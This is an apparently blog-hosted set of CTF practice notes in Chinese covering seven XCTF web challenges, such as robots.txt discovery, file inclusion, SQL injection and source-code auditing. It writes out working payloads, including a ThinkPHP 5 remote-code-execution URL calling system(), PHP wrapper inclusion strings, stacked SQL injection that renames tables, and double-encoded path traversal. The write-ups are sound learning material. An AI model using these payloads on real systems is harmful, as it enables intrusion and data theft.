XCTF进阶区刷题笔记---2020/11/15

1.baby_web


题目地址

打开发现题目被定位到/1.php,根据提示改为index.php,发现还是1.php

打开网络网络监视的index.php文件发现location被设置为1.php,并且找到FLAG


F12

2.Training-WWW-Robots 

访问http://220.249.52.133:59005/robots.txt

发现

爬虫协议

http://220.249.52.133:59005//fl0g.php得到flag

3.php_rce

考点:ThinkPHP5框架底层对控制器名过滤不严,通过url调用到ThinkPHP框架的敏感函数

刚拿到题目没有思路,建议百度一下(tcl

这里推荐Freebuf的一篇文章:ThinkPHP 5.1框架结合RCE漏洞的深入分析

难的不像个两分题

直接给payload:?s=index/think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

4.web_php_include

考点:文件包含和PHP伪协议  大佬的 伪协议学习资料

题目源码

方法1:PHP://input伪协议

strstr()-搜索一个字符串在另一个字符串是否存在(不区分大小写),如果存在则返回字符串及其剩余部分

strstr(string,search,before_search)

str_replace("php://"," ",$page)-搜索$page中是否有php://如果有则用" "代替  区分大小写

可以用PHP://input绕过str_replace函数

构造payload:http://220.249.52.133:41917/?page=PHP://input


input的post流

发现flag的地址 fl4gisisish3r3.php


flag在源码的注释中

如果用<?php show_source('fl4gisisish3r3.php');?> 页面会直接显示出fl4gisisish3r3.php的源码 内含flag。

方法二:date伪协议

构造payload

http://220.249.52.133:33309/?page=data://text/plain,%3C?php%20system(%22ls%22);?%3E

发现fl4gisisish3r3.php文件后


题解


5.supersqli

刚看到题目先用1" or 1=1# 来看看注入效果


发现可以注入 且为get形注入

1.想尝试了一下union方式的注入

先用order by 来判断列数 举例: 15' order by 2 #  发现字段数为2

构造payload:15' union select database(),user()#

被正则表达式过滤----失败

2.改用堆叠注入:使用分号结束上一个语句再叠加其他语句一起执行


15';show databases;#

查询所有的表

15';show tables;#

查询words表中的所有列

payload: 15';show columns from words;#

words表

查询1919810931114514表中的所有列

payloda:15';show columns from`1919810931114514`;#


1919810931114514表

由前面的order by 判断出2列可以查询的默认的查询表为words

改变默认的查询表格,并将flag列名改为id

payload:

15';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table  `words` change `flag` `id` varchar(100);#

然后用万能钥匙(hhh

1' or 1=1#

得到flag


flag!

6.ics-06

根据题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。

点开报表中心进入新的页面

迷惑性极强

发现页面多了给日期范围

起初以为题目的题眼在日期范围,多次尝试无果(死都没想到id爆破)

搜索发现是id爆破,URL get方式请求了id=1,自己搞个id字典开始爆破。

2333!

发现2333length不一样 点开找到flag。

7.warmup(经典题)

F12发现注释<!--source.php-->

访问http://220.249.52.133:59743/source.php

接着访问hint.php 页面显示flag not here, and flag in ffffllllaaaagggg 重新返回source.php 仔细审计一遍代码


主要运行代码

首先! empty($_REQUEST['file']  file参数不能为空

其次! empty($_REQUEST['file'] file参数必须为字符串

接着我们来看checkFile函数


checkfile函数

首先定义了给白名单 $whitelist = ["source"=>"source.php","hint"=>"hint.php"];

其次if (! isset($page) || !is_string($page)) 所以file参数的值不能为空且必须是字符串

接着if (in_array($page, $whitelist)) 验证file参数是否在白名单中,如果你此时的file参数为source.php或hint.php 则会访问source.php或hint.php;显然你要访问的不是它们。

接着往下看

$_page = mb_substr($page,0,mb_strpos($page . '?', '?')

if (in_array($_page, $whitelist)) {return true;}

substr(string,start,length):返回字符串的一部分

string:必需。规定被搜索的字符串。  find:必需。规定要查找的字符。 start:可选。规定要返回的字符串长度。默认是直到字符串的结尾。

strpos(string,find,start):查找字符串在另一字符串中第一次出现的位置

string必需。规定被搜索的字符串。 find必需。规定要查找的字符。 start可选。规定开始搜索的位置。

所以这一段代码的意思是 返回第一个?之前的字符串 如果存在于白名单则返回true。

这里出现了个非预期解法(何为非预期:出题人没想到的

payload:file=hint.php?../../../../../ffffllllaaaagggg (tip:这里的../是一个一个试出来的)

或者 file=source.php?../../../../../ffffllllaaaagggg

抛开这个解法

接着往下看 $_page = urldecode($page);此处是一个url解码

构造payload:file=source.php%253f../../../../../ffffllllaaaagggg

或者file=hint.php%253f../../../../../ffffllllaaaagggg

因为url经过后端时候会自动进行一次解码 所以需要二次编码 ?的第一次URL编码是%3f 第二次URL编码是%253f

可以得到flag.


ffffllllaaaagggg
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 205,033评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,725评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,473评论 0 338
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,846评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,848评论 5 368
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,691评论 1 282
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,053评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,700评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 42,856评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,676评论 2 323
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,787评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,430评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,034评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,990评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,218评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,174评论 2 352
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,526评论 2 343

推荐阅读更多精彩内容

  • 知识点:代码审计,phpmyadmin任意文件包含漏洞参考:phpmyadmin 4.8.1任意文件包含涉及函数:...
    简言之_阅读 1,628评论 0 3
  • 0x01 [HCTF 2018]WarmUp f12看到提示进入source.php,看到代码 分析第一段代码,$...
    Du1in9阅读 1,121评论 0 1
  • [HCTF 2018]WarmUp 打开链接后是一张图片,看看源码提示source.php,进入source.ph...
    佛系小沈阅读 4,773评论 0 4
  • cat 题目描述:抓住那只猫 打开链接,首先看到了一个输入框让我们输入域名。输入百度的ip:220.181.38....
    佛系小沈阅读 4,055评论 0 7
  • 黑色的海岛上悬着一轮又大又圆的明月,毫不嫌弃地把温柔的月色照在这寸草不生的小岛上。一个少年白衣白发,悠闲自如地倚坐...
    小水Vivian阅读 3,093评论 1 5